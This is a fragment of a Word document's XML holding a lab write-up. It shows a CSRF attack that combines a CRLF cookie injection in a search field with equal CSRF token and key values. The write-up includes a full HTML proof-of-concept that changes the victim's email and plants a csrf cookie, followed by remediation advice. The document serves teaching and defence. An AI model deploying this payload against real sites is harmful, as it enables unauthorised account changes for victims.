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7A6F8AB1"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466759">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B6F7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>even though some security controls are implemented but those tokens are not tied to</w:t>
      </w:r>
      <w:r w:rsidR="00307CC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> any session cookie but to a separate CSRF Key cookie as the application uses two different frameworks for session and CSRF</w:t>
      </w:r>
      <w:r w:rsidR="004E4E12">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and that too is duplicated also called double submit defen</w:t>
      </w:r>
      <w:r w:rsidR="00932EDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="004E4E12">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>e mechanism</w:t>
      </w:r>
      <w:r w:rsidR="00C44177">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.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47FB9765" w14:textId="669DD0F5" w:rsidR="00565BE0" w:rsidRDefault="00565BE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Check if there are any loopholes by changing the request type, CSRF Key, CSRF Token, Session Token, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653E7FFC" w14:textId="295668AB" w:rsidR="009A34DE" w:rsidRDefault="00BC0D3D" w:rsidP="002C5D7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will get to know that if we </w:t>
      </w:r>
      <w:r w:rsidR="00932EDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>made both, the CSRF Key and Token same then our request is accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6E3610" w14:textId="1F57EF6F" w:rsidR="005F4BF7" w:rsidRDefault="005F4BF7" w:rsidP="009A34D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Search something from the target’s browser and inspect the source, we see that there is no CSRF mechanism to protect it so we will inject the payload into it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DB70A6" w14:textId="495ED91D" w:rsidR="00D1236B" w:rsidRDefault="00D1236B" w:rsidP="009A34D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go to the original request made by the target and create a CSRF PoC from Engagement tools</w:t>
      </w:r>
      <w:r w:rsidR="005F4BF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and modify it according to the payload</w:t>
      </w:r>
      <w:r w:rsidR="00FF46C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> by changing the CSRF details according to the </w:t>
      </w:r>
      <w:r w:rsidR="00426ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>attacker’s</w:t>
      </w:r>
      <w:r w:rsidR="002C5D7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and also make the CSRF Token and Key equal</w:t>
      </w:r>
      <w:r w:rsidR="00426ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF2DF48" w14:textId="08095EDE"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request </w:t>
      </w:r>
      <w:r w:rsidR="00846E37" w:rsidRPr="00846E37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">into the body tag of the exploit </w:t>
      </w:r>
      <w:r w:rsidR="00846E37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="009A34DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>replace the original token with the attacker’s token</w:t>
      </w:r>
      <w:r w:rsidR="00846E37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>then click store.</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2E25AF08"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&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B88345"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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0039456D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;!--</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0039456D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF PoC - generated by Burp Suite Professional --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F90E534"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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B5CE8A"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  &lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0039456D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>history.pushState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0039456D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>('', '', '/')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC14506"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&lt;form action="https://0a650084042913f3802349ba007700cf.web-security-academy.net/my-account/change-email" method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A81B632"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&lt;input type="hidden" name="email" value="hack@hacker.com" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D376CC9"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&lt;input type="hidden" name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0039456D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>csrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0039456D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>" value="test" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525545F1"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&lt;input type="submit" value="Submit request" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C69102F"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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559EA88D"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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0039456D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0039456D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> src="https://0a650084042913f3802349ba007700cf.web-security-academy.net/?search=shit%0d%0aSet-Cookie:%20csrf=test%3b%20SameSite=None" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0039456D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0039456D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0039456D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>document.forms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0039456D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>[0].submit()"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B4FC05"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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689156CE" w14:textId="34351AA4" w:rsidR="006C25F7" w:rsidRPr="006C0B72"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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9F744A" w14:textId="24C4D243" w:rsidR="006C0B72" w:rsidRPr="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B72">
      <w:pP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9FDB13A" w14:textId="77777777" w:rsidR="000A2078" w:rsidRDefault="000A2078" w:rsidP="000A2078">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A2078">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Tighten CSRF Token and Key Validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2078">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure that the CSRF token and key are validated individually against their expected respective values. A system where the CSRF token and key can be made identical and still be accepted reveals a flaw in validation logic. By treating these as distinct and non-interchangeable values, stricter validation is enforced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132F4141" w14:textId="77777777" w:rsidR="000A2078" w:rsidRDefault="000A2078" w:rsidP="00620947">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A2078">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Tie CSRF Tokens to Session Cookies:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2078">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Although the application employs different frameworks for session management and CSRF protection, it's crucial to associate the CSRF token directly with the user's session. By doing this, even if an attacker gets hold of a CSRF token, it's rendered useless outside the context of the specific user's session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E78AB9B" w14:textId="2C60A88F" w:rsidR="002F152E" w:rsidRPr="000A2078" w:rsidRDefault="000A2078" w:rsidP="00620947">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A2078">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Implement Proper Input Validation and Sanitization:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2078">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> All inputs, including those from search fields, should undergo thorough sanitization and validation prior to processing. Refrain from reflecting user input back to the response without the right sanitization. This approach will mitigate the risks associated with potential injection attacks, as seen in the exploit where a cookie value was set.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002F152E" w:rsidRPr="000A2078"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8455D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E00F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6"/>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883975352">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2108847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2078"/>
    <w:rsid w:val="000A306E"/>
    <w:rsid w:val="000B5333"/>
    <w:rsid w:val="000D5093"/>
    <w:rsid w:val="000D7CE5"/>
    <w:rsid w:val="000E4A5B"/>
    <w:rsid w:val="000F0291"/>
    <w:rsid w:val="000F4FE7"/>
    <w:rsid w:val="000F5F61"/>
    <w:rsid w:val="001007B5"/>
    <w:rsid w:val="00115586"/>
    <w:rsid w:val="00131AF3"/>
    <w:rsid w:val="00146DDF"/>
    <w:rsid w:val="0014796E"/>
    <w:rsid w:val="0015780E"/>
    <w:rsid w:val="00165B56"/>
    <w:rsid w:val="001768CB"/>
    <w:rsid w:val="00193EED"/>
    <w:rsid w:val="001B6F7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C24BB"/>
    <w:rsid w:val="002C5D7F"/>
    <w:rsid w:val="002D2C78"/>
    <w:rsid w:val="002E07F4"/>
    <w:rsid w:val="002F152E"/>
    <w:rsid w:val="002F3625"/>
    <w:rsid w:val="002F54EB"/>
    <w:rsid w:val="0030439C"/>
    <w:rsid w:val="00307CC9"/>
    <w:rsid w:val="00317C2D"/>
    <w:rsid w:val="003202F7"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="0033120F"/>
    <w:rsid w:val="003358E4"/>
    <w:rsid w:val="0036197C"/>
    <w:rsid w:val="00380DB3"/>
    <w:rsid w:val="0038106E"/>
    <w:rsid w:val="00385CF9"/>
    <w:rsid w:val="00392C30"/>
    <w:rsid w:val="0039456D"/>
    <w:rsid w:val="003978F4"/>
    <w:rsid w:val="003A5F44"/>
    <w:rsid w:val="003C1DDC"/>
    <w:rsid w:val="003D523D"/>
    <w:rsid w:val="00426ED0"/>
    <w:rsid w:val="00437C9B"/>
    <w:rsid w:val="00454915"/>
    <w:rsid w:val="00466759"/>
    <w:rsid w:val="00482A06"/>
    <w:rsid w:val="00495017"/>
    <w:rsid w:val="004C039A"/>
    <w:rsid w:val="004C075B"/>
    <w:rsid w:val="004C3608"/>
    <w:rsid w:val="004C37DD"/>
    <w:rsid w:val="004E26E8"/>
    <w:rsid w:val="004E4E12"/>
    <w:rsid w:val="005036F1"/>
    <w:rsid w:val="00513F5E"/>
    <w:rsid w:val="0052488A"/>
    <w:rsid w:val="00532A89"/>
    <w:rsid w:val="00554D32"/>
    <w:rsid w:val="00557B86"/>
    <w:rsid w:val="005657B0"/>
    <w:rsid w:val="00565BE0"/>
    <w:rsid w:val="0057090A"/>
    <w:rsid w:val="00572214"/>
    <w:rsid w:val="00591996"/>
    <w:rsid w:val="0059201C"/>
    <w:rsid w:val="005A5FE5"/>
    <w:rsid w:val="005B588A"/>
    <w:rsid w:val="005B750D"/>
    <w:rsid w:val="005C275F"/>
    <w:rsid w:val="005C5A61"/>
    <w:rsid w:val="005E6AA5"/>
    <w:rsid w:val="005E7D42"/>
    <w:rsid w:val="005F4BF7"/>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F411A"/>
    <w:rsid w:val="00A01591"/>
    <w:rsid w:val="00A062A5"/>
    <w:rsid w:val="00A071F4"/>
    <w:rsid w:val="00A35B3A"/>
    <w:rsid w:val="00A44CF7"/>
    <w:rsid w:val="00A834AE"/>
    <w:rsid w:val="00A83ED9"/>
    <w:rsid w:val="00AA2AE9"/>
    <w:rsid w:val="00AD0C9C"/>
    <w:rsid w:val="00AF10D6"/>
    <w:rsid w:val="00AF3753"/>
    <w:rsid w:val="00AF4389"/>
    <w:rsid w:val="00B026F1"/>
    <w:rsid w:val="00B03E11"/>
    <w:rsid w:val="00B112CB"/>
    <w:rsid w:val="00B156EB"/>
    <w:rsid w:val="00B2193E"/>
    <w:rsid w:val="00B33405"/>
    <w:rsid w:val="00B45D8B"/>
    <w:rsid w:val="00B47073"/>
    <w:rsid w:val="00B47E54"/>
    <w:rsid w:val="00B57949"/>
    <w:rsid w:val="00BA7C57"/>
    <w:rsid w:val="00BB5CA6"/>
    <w:rsid w:val="00BC0D3D"/>
    <w:rsid w:val="00BC1739"/>
    <w:rsid w:val="00BC3984"/>
    <w:rsid w:val="00BC7780"/>
    <w:rsid w:val="00BD3EE9"/>
    <w:rsid w:val="00BD4233"/>
    <w:rsid w:val="00BE0CC0"/>
    <w:rsid w:val="00BE32AB"/>
    <w:rsid w:val="00BF2868"/>
    <w:rsid w:val="00C44177"/>
    <w:rsid w:val="00C44B26"/>
    <w:rsid w:val="00C4551B"/>
    <w:rsid w:val="00C46CCB"/>
    <w:rsid w:val="00C47C8F"/>
    <w:rsid w:val="00C61158"/>
    <w:rsid w:val="00C74415"/>
    <w:rsid w:val="00C84C96"/>
    <w:rsid w:val="00CB1CA7"/>
    <w:rsid w:val="00CB43ED"/>
    <w:rsid w:val="00CD3D3A"/>
    <w:rsid w:val="00CF4E92"/>
    <w:rsid w:val="00D043EB"/>
    <w:rsid w:val="00D1236B"/>
    <w:rsid w:val="00D46E1C"/>
    <w:rsid w:val="00D64007"/>
    <w:rsid w:val="00D70127"/>
    <w:rsid w:val="00D76CFA"/>
    <w:rsid w:val="00D82D12"/>
    <w:rsid w:val="00DA01A0"/>
    <w:rsid w:val="00DA1896"/>
    <w:rsid w:val="00DB3836"/>
    <w:rsid w:val="00DC6ED7"/>
    <w:rsid w:val="00DD59AE"/>
    <w:rsid w:val="00DF0D04"/>
    <w:rsid w:val="00DF3E68"/>
    <w:rsid w:val="00E014E9"/>
    <w:rsid w:val="00E036C2"/>
    <w:rsid w:val="00E050CA"/>
    <w:rsid w:val="00E3082B"/>
    <w:rsid w:val="00E31496"/>
    <w:rsid w:val="00E35637"/>
    <w:rsid w:val="00E36C66"/>
    <w:rsid w:val="00E64623"/>
    <w:rsid w:val="00E71825"/>
    <w:rsid w:val="00E86B4D"/>
    <w:rsid w:val="00EA6346"/>
    <w:rsid w:val="00EA760C"/>
    <w:rsid w:val="00EC1C27"/>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6868">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>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18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-15T05:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-06T05:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>